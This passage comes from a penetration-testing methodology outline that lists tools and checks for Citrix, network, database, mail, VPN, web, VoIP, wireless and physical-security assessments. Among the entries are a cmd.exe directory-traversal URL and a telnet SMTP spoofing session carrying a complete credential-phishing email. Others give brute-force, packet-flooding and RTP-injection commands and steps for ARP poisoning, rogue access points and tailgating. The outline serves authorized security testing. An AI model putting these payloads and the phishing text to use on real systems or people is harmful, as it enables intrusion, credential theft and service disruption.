20.4.3.5.1. Ctrl + h – View History
20.4.3.5.2. Ctrl + n – New Browser
20.4.3.5.3. Shift + Left Click – New Browser
20.4.3.5.4. Ctrl + o – Internet Address (browse feature)
20.4.3.5.5. Ctrl + p – Print (to file)
20.4.3.5.6. Right Click (Shift + F10)
20.4.3.5.7. F1 – Jump to URL
20.4.3.5.8. SHIFT+F1: Local Task List
20.4.3.5.9. SHIFT+F2: Toggle Title Bar
20.4.3.5.10. SHIFT+F3: Close Remote Application
20.4.3.5.11. CTRL+F1: Displays Windows Security Desktop – Ctrl+Alt+Del
20.4.3.5.12. CTRL+F2: Remote Task List
20.4.3.5.13. CTRL+F3: Remote Task Manager – Ctrl+Shift+ESC
20.4.3.5.14. ALT+F2: Cycle through programs
20.4.3.5.15. ALT+PLUS: Alt+TAB
20.4.3.5.16. ALT+MINUS: ALT+SHIFT+TAB
20.5. Brute Force
20.5.1. bforce.js
20.5.1.1. bforce.js TCPBrowserAddress=ip_address usernames=user1,user2 passwords=pass1,pass2
20.5.1.2. bforce.js HTTPBrowserAddress=ip_address userfile=file.txt passfile=file.txt
20.5.1.3. Untitled
20.6. Review Configuration Files
20.6.1. Application server configuration file
20.6.1.1. appsrv.ini
20.6.1.1.1. Location
20.6.1.1.2. World writeable
20.6.1.1.3. Review other files
20.6.1.1.4. Sample file
20.6.2. Program Neighborhood configuration file
20.6.2.1. pn.ini
20.6.2.1.1. Location
20.6.2.1.2. Review other files
20.6.2.1.3. Sample file
20.6.3. Citrix ICA client configuration file
20.6.3.1. wfclient.ini
20.6.3.1.1. Location
20.7. References
20.7.1. Vulnerabilities
20.7.1.1. Art of Hacking
20.7.1.2. Common Vulnerabilities and Exploits (CVE)
20.7.1.2.1. Sample file
20.7.1.2.2. Untitled
20.7.1.2.3. http://cve.mitre.org/cgi-bin/cvekey.cgi?keyword=citrix
20.7.1.3. OSVDB
20.7.1.3.1. http://osvdb.org/search/search?search[vuln_title]=Citrix&search[text_type]=titles&search[s_date]=&search[e_date]=&search[refid]=&search[referencetypes]=&search[vendors]=&kthx=searchSecunia
20.7.1.4. Secunia
20.7.1.5. Security-database.com
20.7.1.5.1. http://www.security-database.com/cgi-bin/search-sd.cgi?q=Citrix
20.7.1.6. SecurityFocus
20.7.2. Support
20.7.2.1. Citrix
20.7.2.1.1. Knowledge Base
20.7.2.2. Thinworld
20.7.3. Exploits
20.7.3.1. Milw0rm
20.7.3.1.1. http://www.milw0rm.com/search.php
20.7.3.2. Art of Hacking
20.7.3.2.1. Citrix
20.7.4. Tools Resource
20.7.4.1. Zip file containing the majority of tools mentioned in this article into a zip file for easy download/ access
21. Network Backbone
21.1. Generic Toolset
21.1.1. Wireshark (Formerly Ethereal)
21.1.1.1. Passive Sniffing
21.1.1.1.1. Usernames/Passwords
21.1.1.1.2. Email
21.1.1.1.3. FTP
21.1.1.1.4. HTTP
21.1.1.1.5. HTTPS
21.1.1.1.6. RDP
21.1.1.1.7. VOIP
21.1.1.1.8. Other
21.1.1.2. Filters
21.1.1.2.1. ip.src == ip_address
21.1.1.2.2. ip.dst == ip_address
21.1.1.2.3. tcp.dstport == port_no.
21.1.1.2.4. ! ip.addr == ip_address
21.1.1.2.5. (ip.addr eq ip_address and ip.addr eq ip_address) and (tcp.port eq 1829 and tcp.port eq 1863)
21.1.2. Cain & Abel
21.1.2.1. Active Sniffing
21.1.2.1.1. ARP Cache Poisoning
21.1.2.1.2. DNS Poisoning
21.1.2.1.3. Routing Protocols
21.1.3. Cisco-Torch
21.1.3.1. ./cisco-torch.pl <options> <IP,hostname,network> or ./cisco-torch.pl <options> -F <hostlist>
21.1.4. NTP-Fingerprint
21.1.4.1. perl ntp-fingerprint.pl -t [ip_address]
21.1.5. Yersinia
21.1.6. p0f
21.1.6.1. ./p0f [ -f file ] [ -i device ] [ -s file ] [ -o file ] [ -w file ] [ -Q sock ] [ -u user ] [ -FXVONDUKASCMRqtpvdlr ] [ -c size ] [ -T nn ] [ 'filter rule' ]
21.1.7. Manual Check (Credentials required)
21.1.8. MAC Spoofing
21.1.8.1. mac address changer for windows
21.1.8.2. macchanger
21.1.8.2.1. Random Mac Address:- macchanger -r eth0
21.1.8.3. madmacs
21.1.8.4. smac
21.1.8.5. TMAC
22. Penetration - An exploit usually relates to the existence of some flaw or vulnerability in an application or operating system that if used could lead to privilege escalation or denial of service against the computer system that is being attacked. Exploits can be compiled and used manually or various engines exist that are essentially at the lowest level pre-compiled point and shoot tools. These engines do also have a number of other extra underlying features for more advanced users.
22.1. Password Attacks
22.1.1. Known Accounts
22.1.1.1. Identified Passwords
22.1.1.2. Unidentified Hashes
22.1.2. Default Accounts
22.1.2.1. Identified Passwords
22.1.2.2. Unidentified Hashes
22.2. Exploits
22.2.1. Successful Exploits
22.2.1.1. Accounts
22.2.1.1.1. Passwords
22.2.1.1.2. Groups
22.2.1.1.3. Other Details
22.2.1.2. Services
22.2.1.3. Backdoor
22.2.1.4. Connectivity
22.2.2. Unsuccessful Exploits
22.2.3. Resources
22.2.3.1. Securiteam
22.2.3.1.1. Exploits are sorted by year and must be downloaded individually
22.2.3.2. SecurityForest
22.2.3.2.1. Updated via CVS after initial install
22.2.3.3. GovernmentSecurity
22.2.3.3.1. Need to create and account to obtain access
22.2.3.4. Red Base Security
22.2.3.4.1. Oracle Exploit site only
22.2.3.5. Wireless Vulnerabilities & Exploits (WVE)
22.2.3.5.1. Wireless Exploit Site
22.2.3.6. PacketStorm Security
22.2.3.6.1. Exploits downloadable by month and year but no indexing carried out.
22.2.3.7. SecWatch
22.2.3.7.1. Exploits sorted by year and month, download seperately
22.2.3.8. SecurityFocus
22.2.3.8.1. Exploits must be downloaded individually
22.2.3.9. Metasploit
22.2.3.9.1. Install and regualrly update via svn
22.2.3.10. Milw0rm
22.2.3.10.1. Exploit archived indexed and sorted by port download as a whole - The one to go for!
22.3. Tools
22.3.1. Metasploit
22.3.1.1. Free Extra Modules
22.3.1.1.1. local copy
22.3.2. Manual SQL Injection
22.3.2.1. Understanding SQL Injection
22.3.2.2. SQL Injection walkthrough
22.3.2.3. SQL Injection by example
22.3.2.4. Blind SQL Injection
22.3.2.5. Advanced SQL Injection in SQL Server
22.3.2.6. More Advanced SQL Injection
22.3.2.7. Advanced SQL Injection in Oracle databases
22.3.2.8. SQL Cheatsheets
22.3.2.8.1. Untitled
22.3.3. SQL Power Injector
22.3.4. SecurityForest
22.3.5. SPI Dynamics WebInspect
22.3.6. Core Impact
22.3.7. Cisco Global Exploiter
22.3.8. PIXDos
22.3.8.1. perl PIXdos.pl [ --device=interface ] [--source=IP] [--dest=IP] [--sourcemac=M AC] [--destmac=MAC] [--port=n]
22.3.9. CANVAS
22.3.10. Inguma
23. Server Specific Tests
23.1. Databases
23.1.1. Direct Access Interrogation
23.1.1.1. MS SQL Server
23.1.1.1.1. Ports
23.1.1.1.2. Version
23.1.1.1.3. osql
23.1.1.2. Oracle
23.1.1.2.1. Ports
23.1.1.2.2. TNS Listener
23.1.1.2.3. SQL Plus
23.1.1.2.4. Default Account/Passwords
23.1.1.2.5. Default SID's
23.1.1.3. MySQL
23.1.1.3.1. Ports
23.1.1.3.2. Version
23.1.1.3.3. Users/Passwords
23.1.1.4. DB2
23.1.1.5. Informix
23.1.1.6. Sybase
23.1.1.7. Other
23.1.2. Scans
23.1.2.1. Default Ports
23.1.2.2. Non-Default Ports
23.1.2.3. Instance Names
23.1.2.4. Versions
23.1.3. Password Attacks
23.1.3.1. Sniffed Passwords
23.1.3.1.1. Cracked Passwords
23.1.3.1.2. Hashes
23.1.3.2. Direct Access Guesses
23.1.4. Vulnerability Assessment
23.1.4.1. Automated
23.1.4.1.1. Reports
23.1.4.1.2. Vulnerabilities
23.1.4.2. Manual
23.1.4.2.1. Patch Levels
23.1.4.2.2. Confirmed Vulnerabilities
23.2. Mail
23.2.1. Scans
23.2.2. Fingerprint
23.2.2.1. Manual
23.2.2.2. Automated
23.2.3. Spoofable
23.2.3.1. Telnet spoof
23.2.3.1.1. telnet target_IP 25helo target.commail from: [email protected] to: [email protected]: [email protected]: [192.168.1.1]X-Originating-Email: [[email protected]]MIME-Version: 1.0To: <[email protected]>From: < [email protected] >Subject: Important! Account check requiredContent-Type: text/htmlContent-Transfer-Encoding: 7bitDear Valued Customer,The corporate network has recently gone through a critical update to the Active Directory, we have done this to increase security of the network against hacker attacks to protect your private information. Due to this, you are required to log onto the following website with your current credentials to ensure that your account does not expire.Please go to the following website and log in with your account details. <a href=http://192.168.1.108/hacme.html>www.target.com/login</a>Online Security Manager.Target [email protected].
23.2.4. Relays
23.3. VPN
23.3.1. Scanning
23.3.1.1. 500 UDP IPSEC
23.3.1.2. 1723 TCP PPTP
23.3.1.3. 443 TCP/SSL
23.3.1.4. nmap -sU -PN -p 500 80.75.68.22-27
23.3.1.5. ipsecscan 80.75.68.22 80.75.68.27
23.3.2. Fingerprinting
23.3.2.1. ike-scan --showbackoff 80.75.68.22 80.75.68.27
23.3.3. PSK Crack
23.3.3.1. ikeprobe 80.75.68.27
23.3.3.2. sniff for responses with C&A or ikecrack
23.4. Web
23.4.1. Vulnerability Assessment
23.4.1.1. Automated
23.4.1.1.1. Reports
23.4.1.1.2. Vulnerabilities
23.4.1.2. Manual
23.4.1.2.1. Patch Levels
23.4.1.2.2. Confirmed Vulnerabilities
23.4.2. Permissions
23.4.2.1. PUT /test.txt HTTP/1.0
23.4.2.2. CONNECT mail.another.com:25 HTTP/1.0
23.4.2.3. POST http://mail.another.com:25/ HTTP/1.0Content-Type: text/plainContent-Length: 6
23.4.3. Scans
23.4.4. Fingerprinting
23.4.4.1. Other
23.4.4.2. HTTP
23.4.4.2.1. Commands
23.4.4.2.2. Modules
23.4.4.2.3. File Extensions
23.4.4.3. HTTPS
23.4.4.3.1. Commands
23.4.4.3.2. Commands
23.4.4.3.3. File Extensions
23.4.5. Directory Traversal
23.4.5.1. http://www.target.com/scripts/..%255c../winnt/system32/cmd.exe?/c+dir+c:\
24. VoIP Security
24.1. Sniffing Tools
24.1.1. AuthTool
24.1.2. Cain & Abel
24.1.3. Etherpeek
24.1.4. NetDude
24.1.5. Oreka
24.1.6. PSIPDump
24.1.7. SIPomatic
24.1.8. SIPv6 Analyzer
24.1.9. UCSniff
24.1.10. VoiPong
24.1.11. VOMIT
24.1.12. Wireshark
24.1.13. WIST - Web Interface for SIP Trace
24.2. Scanning and Enumeration Tools
24.2.1. enumIAX
24.2.2. fping
24.2.3. IAX Enumerator
24.2.4. iWar
24.2.5. Nessus
24.2.6. Nmap
24.2.7. SIP Forum Test Framework (SFTF)
24.2.8. SIPcrack
24.2.9. sipflanker
24.2.9.1. python sipflanker.py 192.168.1-254
24.2.10. SIP-Scan
24.2.11. SIP.Tastic
24.2.12. SIPVicious
24.2.13. SiVuS
24.2.14. SMAP
24.2.14.1. smap IP_Address/Subnet_Mask
24.2.14.2. smap -o IP_Address/Subnet_Mask
24.2.14.3. smap -l IP_Address
24.2.15. snmpwalk
24.2.16. VLANping
24.2.17. VoIPAudit
24.2.18. VoIP GHDB Entries
24.2.19. VoIP Voicemail Database
24.3. Packet Creation and Flooding Tools
24.3.1. H.323 Injection Files
24.3.2. H225regreject
24.3.3. IAXHangup
24.3.4. IAXAuthJack
24.3.5. IAX.Brute
24.3.6. IAXFlooder
24.3.6.1. ./iaxflood sourcename destinationname numpackets
24.3.7. INVITE Flooder
24.3.7.1. ./inviteflood interface target_user target_domain ip_address_target no_of_packets
24.3.8. kphone-ddos
24.3.9. RTP Flooder
24.3.10. rtpbreak
24.3.11. Scapy
24.3.12. Seagull
24.3.13. SIPBomber
24.3.14. SIPNess
24.3.15. SIPp
24.3.16. SIPsak
24.3.16.1. Tracing paths: - sipsak -T -s sip:usernaem@domain
24.3.16.2. Options request:- sipsak -vv -s sip:username@domain
24.3.16.3. Query registered bindings:- sipsak -I -C empty -a password -s sip:username@domain
24.3.17. SIP-Send-Fun
24.3.18. SIPVicious
24.3.19. Spitter
24.3.20. TFTP Brute Force
24.3.20.1. perl tftpbrute.pl <tftpserver> <filelist> <maxprocesses>
24.3.21. UDP Flooder
24.3.21.1. ./udpflood source_ip target_destination_ip src_port dest_port no_of_packets
24.3.22. UDP Flooder (with VLAN Support)
24.3.22.1. ./udpflood source_ip target_destination_ip src_port dest_port TOS user_priority VLAN ID no_of_packets
24.3.23. Voiphopper
24.4. Fuzzing Tools
24.4.1. Asteroid
24.4.2. Codenomicon VoIP Fuzzers
24.4.3. Fuzzy Packet
24.4.4. Mu Security VoIP Fuzzing Platform
24.4.5. ohrwurm RTP Fuzzer
24.4.6. PROTOS H.323 Fuzzer
24.4.7. PROTOS SIP Fuzzer
24.4.8. SIP Forum Test Framework (SFTF)
24.4.9. Sip-Proxy
24.4.10. Spirent ThreatEx
24.5. Signaling Manipulation Tools
24.5.1. AuthTool
24.5.1.1. ./authtool captured_sip_msgs_file -d dictionary -r usernames_passwords -v
24.5.2. BYE Teardown
24.5.3. Check Sync Phone Rebooter
24.5.4. RedirectPoison
24.5.4.1. ./redirectpoison interface target_source_ip target_source_port "<contact_information i.e. sip:100.77.50.52;line=xtrfgy>"
24.5.5. Registration Adder
24.5.6. Registration Eraser
24.5.7. Registration Hijacker
24.5.8. SIP-Kill
24.5.9. SIP-Proxy-Kill
24.5.10. SIP-RedirectRTP
24.5.11. SipRogue
24.5.12. vnak
24.6. Media Manipulation Tools
24.6.1. RTP InsertSound
24.6.1.1. ./rtpinsertsound interface source_rtp_ip source_rtp_port destination_rtp_ip destination_rtp_port file
24.6.2. RTP MixSound
24.6.2.1. ./rtpmixsound interface source_rtp_ip source_rtp_port destination_rtp_ip destination_rtp_port file
24.6.3. RTPProxy
24.6.4. RTPInject
24.7. Generic Software Suites
24.7.1. OAT Office Communication Server Tool Assessment
24.7.2. EnableSecurity VOIPPACK
24.7.2.1. Note: - Add-on for Immunity Canvas
24.8. References
24.8.1. URL's
24.8.1.1. Common Vulnerabilities and Exploits (CVE)
24.8.1.1.1. Vulnerabilties and exploit information relating to these products can be found here: http://cve.mitre.org/cgi-bin/cvekey.cgi?keyword=voip
24.8.1.2. Default Passwords
24.8.1.3. Hacking Exposed VoIP
24.8.1.3.1. Tool Pre-requisites
24.8.1.4. VoIPsa
24.8.2. White Papers
24.8.2.1. An Analysis of Security Threats and Tools in SIP-Based VoIP Systems
24.8.2.2. An Analysis of VoIP Security Threats and Tools
24.8.2.3. Hacking VoIP Exposed
24.8.2.4. Security testing of SIP implementations
24.8.2.5. SIP Stack Fingerprinting and Stack Difference Attacks
24.8.2.6. Two attacks against VoIP
24.8.2.7. VoIP Attacks!
24.8.2.8. VoIP Security Audit Program (VSAP)
25. Wireless Penetration
25.1. Wireless Assessment. The following information should ideally be obtained/enumerated when carrying out your wireless assessment. All this information is needed to give the tester, (and hence, the customer), a clear and concise picture of the network you are assessing. A brief overview of the network during a pre-site meeting weith the customer should allow you to estimate the timescales required to carry the assessment out.
25.1.1. Site Map
25.1.1.1. RF Map
25.1.1.1.1. Lines of Sight
25.1.1.1.2. Signal Coverage
25.1.1.2. Physical Map
25.1.1.2.1. Triangulate APs
25.1.1.2.2. Satellite Imagery
25.1.2. Network Map
25.1.2.1. MAC Filter
25.1.2.1.1. Authorised MAC Addresses
25.1.2.1.2. Reaction to Spoofed MAC Addresses
25.1.2.2. Encryption Keys utilised
25.1.2.2.1. WEP
25.1.2.2.2. WPA/PSK
25.1.2.2.3. 802.1x
25.1.2.3. Access Points
25.1.2.3.1. ESSID
25.1.2.3.2. BSSIDs
25.1.2.4. Wireless Clients
25.1.2.4.1. MAC Addresses
25.1.2.4.2. Intercepted Traffic
25.2. Wireless Toolkit
25.2.1. Wireless Discovery
25.2.1.1. Aerosol
25.2.1.2. Airfart
25.2.1.3. Aphopper
25.2.1.4. Apradar
25.2.1.5. BAFFLE
25.2.1.6. inSSIDer
25.2.1.7. iWEPPro
25.2.1.8. karma
25.2.1.9. KisMAC-ng
25.2.1.10. Kismet
25.2.1.11. MiniStumbler
25.2.1.12. Netstumbler
25.2.1.13. Vistumbler
25.2.1.14. Wellenreiter
25.2.1.15. Wifi Hopper
25.2.1.16. WirelessMon
25.2.1.17. WiFiFoFum
25.2.2. Packet Capture
25.2.2.1. Airopeek
25.2.2.2. Airpcap
25.2.2.3. Airtraf
25.2.2.4. Apsniff
25.2.2.5. Cain
25.2.2.6. Commview
25.2.2.7. Ettercap
25.2.2.8. Netmon
25.2.2.8.1. nmwifi
25.2.2.9. Wireshark
25.2.3. EAP Attack tools
25.2.3.1. eapmd5pass
25.2.3.1.1. eapmd5pass -w dictionary_file -r eapmd5-capture.dump
25.2.3.1.2. Untitled
25.2.4. Leap Attack Tools
25.2.4.1. asleap
25.2.4.2. thc leap cracker
25.2.4.3. anwrap
25.2.5. WEP/ WPA Password Attack Tools
25.2.5.1. Airbase
25.2.5.2. Aircrack-ptw
25.2.5.3. Aircrack-ng
25.2.5.4. Airsnort
25.2.5.5. cowpatty
25.2.5.6. FiOS Wireless Key Calculator
25.2.5.7. iWifiHack
25.2.5.8. KisMAC-ng
25.2.5.9. Rainbow Tables
25.2.5.10. wep attack
25.2.5.11. wep crack
25.2.5.12. wzcook
25.2.6. Frame Generation Software
25.2.6.1. Airgobbler
25.2.6.2. airpwn
25.2.6.3. Airsnarf
25.2.6.4. Commview
25.2.6.5. fake ap
25.2.6.6. void 11
25.2.6.7. wifi tap
25.2.6.7.1. wifitap -b <BSSID> [-o <iface>] [-i <iface> [-p] [-w <WEP key> [-k <key id>]] [-d [-v]] [-h]
25.2.6.8. FreeRADIUS - Wireless Pwnage Edition
25.2.7. Mapping Software
25.2.7.1. Online Mapping
25.2.7.1.1. WIGLE
25.2.7.1.2. Skyhook
25.2.7.2. Tools
25.2.7.2.1. Knsgem
25.2.8. File Format Conversion Tools
25.2.8.1. ns1 recovery and conversion tool
25.2.8.2. warbable
25.2.8.3. warkizniz
25.2.8.3.1. warkizniz04b.exe [kismet.csv] [kismet.gps] [ns1 filename]
25.2.8.4. ivstools
25.2.9. IDS Tools
25.2.9.1. WIDZ
25.2.9.2. War Scanner
25.2.9.3. Snort-Wireless
25.2.9.4. AirDefense
25.2.9.5. AirMagnet
25.3. WLAN discovery
25.3.1. Unencrypted WLAN
25.3.1.1. Visible SSID
25.3.1.1.1. Sniff for IP range
25.3.1.2. Hidden SSID
25.3.1.2.1. Deauth client
25.3.2. WEP encrypted WLAN
25.3.2.1. Visible SSID
25.3.2.1.1. WEPattack
25.3.2.2. Hidden SSID
25.3.2.2.1. Deauth client
25.3.3. WPA / WPA2 encrypted WLAN
25.3.3.1. Deauth client
25.3.3.1.1. Capture EAPOL handshake
25.3.4. LEAP encrypted WLAN
25.3.4.1. Deauth client
25.3.4.1.1. Break LEAP
25.3.5. 802.1x WLAN
25.3.5.1. Create Rogue Access Point
25.3.5.1.1. Airsnarf
25.3.5.1.2. fake ap
25.3.5.1.3. Hotspotter
25.3.5.1.4. Karma
25.3.5.1.5. Linux rogue AP
25.3.6. Resources
25.3.6.1. URL's
25.3.6.1.1. Wirelessdefence.org
25.3.6.1.2. Russix
25.3.6.1.3. Wardrive.net
25.3.6.1.4. Wireless Vulnerabilities and Exploits (WVE)
25.3.6.2. White Papers
25.3.6.2.1. Weaknesses in the Key Scheduling Algorithm of RC4
25.3.6.2.2. 802.11b Firmware-Level Attacks
25.3.6.2.3. Wireless Attacks from an Intrusion Detection Perspective
25.3.6.2.4. Implementing a Secure Wireless Network for a Windows Environment
25.3.6.2.5. Breaking 104 bit WEP in less than 60 seconds
25.3.6.2.6. PEAP Shmoocon2008 Wright & Antoniewicz
25.3.6.2.7. Active behavioral fingerprinting of wireless devices
25.3.6.3. Common Vulnerabilities and Exploits (CVE)
25.3.6.3.1. Vulnerabilties and exploit information relating to these products can be found here: http://cve.mitre.org/cgi-bin/cvekey.cgi?keyword=wireless
26. Physical Security
26.1. Building Security
26.1.1. Meeting Rooms
26.1.1.1. Check for active network jacks.
26.1.1.2. Check for any information in room.
26.1.2. Lobby
26.1.2.1. Check for active network jacks.
26.1.2.2. Does receptionist/guard leave lobby?
26.1.2.3. Accessbile printers? Print test page.
26.1.2.4. Obtain phone/personnel listing.
26.1.3. Communal Areas
26.1.3.1. Check for active network jacks.
26.1.3.2. Check for any information in room.
26.1.3.3. Listen for employee conversations.
26.1.4. Room Security
26.1.4.1. Resistance of lock to picking.
26.1.4.1.1. What type of locks are used in building? Pin tumblers, padlocks, abinet locks, dimple keys, proximity sensors?
26.1.4.2. Ceiling access areas.
26.1.4.2.1. Can you enter the ceiling space (above a suspended ceiling) and enter secured rooms?
26.1.5. Windows
26.1.5.1. Check windows/doors for visible intruderalarm sensors.
26.1.5.2. Check visible areas for sensitive information.
26.1.5.3. Can you video users logging on?
26.2. Perimeter Security
26.2.1. Fence Security
26.2.1.1. Attempt to verify that the whole of the perimeter fence is unbroken.
26.2.2. Exterior Doors
26.2.2.1. If there is no perimeter fence, then determineif exterior doors are secured, guarded andmonitored etc.
26.2.3. Guards
26.2.3.1. Patrol Routines
26.2.3.1.1. Analyse patrol timings to ascertain if any holes exist in the coverage.
26.2.3.2. Communications
26.2.3.2.1. Intercept and analyse guard communications. Determine if the communication methods can be used to aid a physial intrusion.
26.3. Entry Points
26.3.1. Guarded Doors
26.3.1.1. Piggybacking
26.3.1.1.1. Attempt to closely follow employees into thebuilding without having to show valid credentials.
26.3.1.2. Fake ID
26.3.1.2.1. Attempt to use fake ID to gain access.
26.3.1.3. Access Methods
26.3.1.3.1. Test 'out of hours' entry methods
26.3.2. Unguarded Doors
26.3.2.1. Identify all unguardedentry points.
26.3.2.1.1. Are doors secured?
26.3.2.1.2. Check locks for resistance to lock picking.
26.3.3. Windows
26.3.3.1. Check windows/doors for visible intruderalarm sensors.
26.3.3.1.1. Attempt to bypass sensors.
26.4. Office Waste
26.4.1. Dumpster DivingAttempt to retrieve any useful information from ToE refuse. This may include : printed documents, books, manuals, laptops, PDA's, USB memory devices, CD's, Floppy discs etc
27. Final Report - template
28. Contributors
28.1. Matt Byrne (WirelessDefence.org)
28.1.1. Matt contributed the majority of the Wireless section.
28.2. Arvind Doraiswamy (Paladion.net)
28.2.1. Arvind kindly contributed to the associated MySQL section when coming across TCP Port 3306 open.
28.3. Lee Lawson (Dns.co.uk)
28.3.1. Lee contributed the majority of the Cisco and Social Engineering sections.